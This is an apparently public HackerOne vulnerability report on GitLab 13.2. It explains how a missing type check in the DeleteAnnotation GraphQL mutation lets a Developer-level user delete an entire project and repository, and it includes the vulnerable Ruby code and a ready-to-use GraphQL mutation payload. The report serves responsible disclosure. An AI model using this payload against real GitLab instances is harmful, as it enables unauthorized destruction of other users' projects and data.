Insufficient Type Check leading to Developer ability to delete Project, Repository, Group, ...

HackerOne report #960244 by ledz1996 on 2020-08-17, assigned to @dcouture:

Report | Attachments | How To Reproduce

Report

Summary

Similar bug to #858671, but this time with annotations mutation: DeleteAnnotation

in app/graphql/mutations/metrics/dashboard/annotations/base.rb

module Mutations  
  module Metrics  
    module Dashboard  
      module Annotations  
        class Base < BaseMutation  
          private

          # This method is defined here in order to be used by `authorized_find!` in the subclasses.  
          def find_object(id:)  
            GitlabSchema.object_from_id(id)  
          end  
        end  
      end  
    end  
  end  
end

There is no type check for find_object in app/graphql/mutations/metrics/dashboard/annotations/delete.rb

    annotation = authorized_find!(id: id)

            result = ::Metrics::Dashboard::Annotations::DeleteService.new(context[:current_user], annotation).execute  

And luckily, Developer is sufficient for the permission check

app/services/metrics/dashboard/annotations/delete_service.rb

Ability.allowed?(user, :delete_metrics_dashboard_annotation, annotation)  

Steps to reproduce

1. For User A, Create project A Private adding User B as Developer
2. For User B, execute the following mutation in http://gitlab.example.vm/-/graphql-explorer

mutation {  
  deleteAnnotation(input: {id: "gid://Gitlab/Project/<project-id>"}) {  
    clientMutationId  
  }  
}

3. Project disappear along with Repository

Removing video now that the issue is public at the request of the reporter

Results of GitLab environment info

System information  
System:       
Proxy:      no  
Current User:   git  
Using RVM:  no  
Ruby Version:   2.6.6p146  
Gem Version:    2.7.10  
Bundler Version:1.17.3  
Rake Version:   12.3.3  
Redis Version:  5.0.9  
Git Version:    2.27.0  
Sidekiq Version:5.2.9  
Go Version: unknown

GitLab information  
Version:    13.2.3-ee  
Revision:   640e2695514  
Directory:  /opt/gitlab/embedded/service/gitlab-rails  
DB Adapter: PostgreSQL  
DB Version: 11.7  
URL:        http://gitlab.example.vm  
HTTP Clone URL: http://gitlab.example.vm/some-group/some-project.git  
SSH Clone URL:  git@gitlab.example.vm:some-group/some-project.git  
Elasticsearch:  no  
Geo:        no  
Using LDAP: no  
Using Omniauth: yes  
Omniauth Providers: 

GitLab Shell  
Version:    13.3.0  
Repository storage paths:  
- default:  /var/opt/gitlab/git-data/repositories  
GitLab Shell path:      /opt/gitlab/embedded/service/gitlab-shell  
Git:        /opt/gitlab/embedded/bin/git  

Impact

Unauthorized deleting of repository/project by maintainers, developers

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

Removing video now that the issue is public at the request of the reporter

How To Reproduce

Please add reproducibility information to this section:

1. See the steps to reproduce above by the reporter they are very clear